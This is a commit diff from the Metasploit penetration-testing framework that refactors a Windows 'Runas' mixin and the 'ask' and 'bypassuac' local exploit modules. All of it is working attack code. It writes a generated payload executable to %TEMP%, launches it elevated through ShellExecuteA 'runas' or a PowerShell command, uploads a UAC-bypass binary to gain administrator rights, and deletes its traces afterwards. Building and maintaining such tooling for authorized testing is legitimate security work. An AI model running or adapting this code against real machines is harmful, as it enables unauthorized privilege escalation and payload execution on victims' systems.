Land rapid7#2585, Refactor Bypassuac with Runas Mixin

Meatballs1 · Meatballs1 · commit d5959d6bd67a · 2014-09-28T09:24:22.000+01:00
diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
@@ -4,35 +4,34 @@
 require 'msf/core/exploit/exe'
 
 module Msf::Post::Windows::Runas
+
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::Powershell
 
-  def execute_exe(filename = nil, path = nil, upload = nil)
+  def shell_execute_exe(filename = nil, path = nil)
+    exe_payload = generate_payload_exe
     payload_filename = filename || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe'
-    payload_path = path || get_env('TEMP')
+    payload_path = path || expand_path('%TEMP%')
     cmd_location = "#{payload_path}\\#{payload_filename}"
-
-    if upload
-      exe_payload = generate_payload_exe
-      print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
-      write_file(cmd_location, exe_payload)
-    else
-      print_status("No file uploaded, attempting to execute #{cmd_location}...")
-    end
-
-    shell_exec(cmd_location, nil)
+    print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+    write_file(cmd_location, exe_payload)
+    command, args = cmd_location, nil
+    shell_exec(command, args)
   end
 
-  def execute_psh
+  def shell_execute_psh
     powershell_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
     command = 'cmd.exe'
     args = "/c #{powershell_command}"
     shell_exec(command, args)
   end
 
   def shell_exec(command, args)
-    print_status('Executing elevated command...')
+    print_status('Executing Command!')
     session.railgun.shell32.ShellExecuteA(nil, 'runas', command, args, nil, 'SW_SHOW')
+    ::Timeout.timeout(30) do
+      select(nil, nil, nil, 1) until session_created?
+    end
   end
 end
diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb
@@ -37,7 +37,6 @@ def initialize(info = {})
     register_options([
       OptString.new('FILENAME', [false, 'File name on disk']),
       OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
-      OptBool.new('UPLOAD', [true, 'Should the payload be uploaded?', true]),
       OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
     ])
   end
@@ -55,14 +54,11 @@ def exploit
       print_good 'UAC is not enabled, no prompt for the user'
     end
 
-    #
-    # Generate payload and random names for upload
-    #
     case datastore['TECHNIQUE']
     when 'EXE'
-      execute_exe(datastore['FILENAME'], datastore['PATH'], datastore['UPLOAD'])
+      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])
     when 'PSH'
-      execute_psh
+      shell_execute_psh
     end
   end
 end
diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb
@@ -4,17 +4,17 @@
 ##
 
 require 'msf/core'
-require 'msf/core/exploit/exe'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Exploit::EXE
   include Post::File
   include Post::Windows::Priv
+  include Post::Windows::Runas
 
   def initialize(info={})
-    super( update_info( info,
+    super( update_info(info,
       'Name'          => 'Windows Escalate UAC Protection Bypass',
       'Description'   => %q{
         This module will bypass Windows UAC by utilizing the trusted publisher
@@ -23,9 +23,9 @@ def initialize(info={})
       },
       'License'       => MSF_LICENSE,
       'Author'        => [
-          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
-          'mitnick',
-          'mubix' # Port to local exploit
+        'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
+        'mitnick',
+        'mubix' # Port to local exploit
         ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
@@ -40,6 +40,11 @@ def initialize(info={})
       'DisclosureDate'=> "Dec 31 2010"
     ))
 
+    register_options([
+      OptEnum.new('TECHNIQUE', [true, 'Technique to use if UAC is turned off',
+                               'EXE', %w(PSH EXE)]),
+    ])
+
   end
 
   def check_permissions!
@@ -54,12 +59,12 @@ def check_permissions!
       if admin_group
         print_good('Part of Administrators group! Continuing...')
       else
-        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+        fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
       end
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
-      fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
+      fail_with(Exploit::Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
     end
   end
 
@@ -72,8 +77,8 @@ def exploit
         "UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
       )
     when UAC_DEFAULT
-      print_good "UAC is set to Default"
-      print_good "BypassUAC can bypass this setting, continuing..."
+      print_good 'UAC is set to Default'
+      print_good 'BypassUAC can bypass this setting, continuing...'
     when UAC_NO_PROMPT
       print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
       runas_method
@@ -89,15 +94,13 @@ def exploit
     pid = cmd_exec_get_pid(cmd)
 
     ::Timeout.timeout(30) do
-      until session_created? do
-        select(nil,nil,nil,1)
-      end
+      select(nil, nil, nil, 1) until session_created?
     end
     session.sys.process.kill(pid)
     # delete the uac bypass payload
     file_rm(path_bypass)
     file_rm("#{expand_path("%TEMP%")}\\tior.exe")
-    cmd_exec("cmd.exe", "/c del \"#{expand_path("%TEMP%")}\\w7e*.tmp\"" )
+    cmd_exec('cmd.exe', "/c del \"#{expand_path("%TEMP%")}\\w7e*.tmp\"" )
   end
 
   def path_bypass
@@ -109,24 +112,24 @@ def path_payload
   end
 
   def upload_binaries!
-    print_status("Uploaded the agent to the filesystem....")
+    print_status('Uploaded the agent to the filesystem....')
     #
     # Generate payload and random names for upload
     #
     payload = generate_payload_exe
 
     # path to the bypassuac binary
-    path = ::File.join(Msf::Config.data_directory, "post")
+    path = ::File.join(Msf::Config.data_directory, 'post')
 
     # decide, x86 or x64
     bpexe = nil
     if sysinfo["Architecture"] =~ /x64/i
-      bpexe = ::File.join(path, "bypassuac-x64.exe")
+      bpexe = ::File.join(path, 'bypassuac-x64.exe')
     else
-      bpexe = ::File.join(path, "bypassuac-x86.exe")
+      bpexe = ::File.join(path, 'bypassuac-x86.exe')
     end
 
-    print_status("Uploading the bypass UAC executable to the filesystem...")
+    print_status('Uploading the bypass UAC executable to the filesystem...')
 
     begin
       #
@@ -143,38 +146,35 @@ def upload_binaries!
   end
 
   def runas_method
-    payload = generate_payload_exe
-    payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-    tmpdir = expand_path("%TEMP%")
-    tempexe = tmpdir + "\\" + payload_filename
-    write_file(tempexe, payload)
-    print_status("Uploading payload: #{tempexe}")
-    session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
-    print_status("Payload executed")
+    case datastore['TECHNIQUE']
+    when 'PSH'
+      # execute PSH
+      shell_execute_psh
+    when 'EXE'
+      # execute EXE
+      shell_execute_exe
+    end
   end
 
   def validate_environment!
     fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
     #
     # Verify use against Vista+
     #
-    winver = sysinfo["OS"]
+    winver = sysinfo['OS']
 
     unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
       fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
     end
 
     if is_uac_enabled?
-      print_status "UAC is Enabled, checking level..."
+      print_status 'UAC is Enabled, checking level...'
     else
       if is_in_admin_group?
-        fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
+        fail_with(Exploit::Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
       else
-        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+        fail_with(Exploit::Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
       end
     end
   end
-
-
 end
-
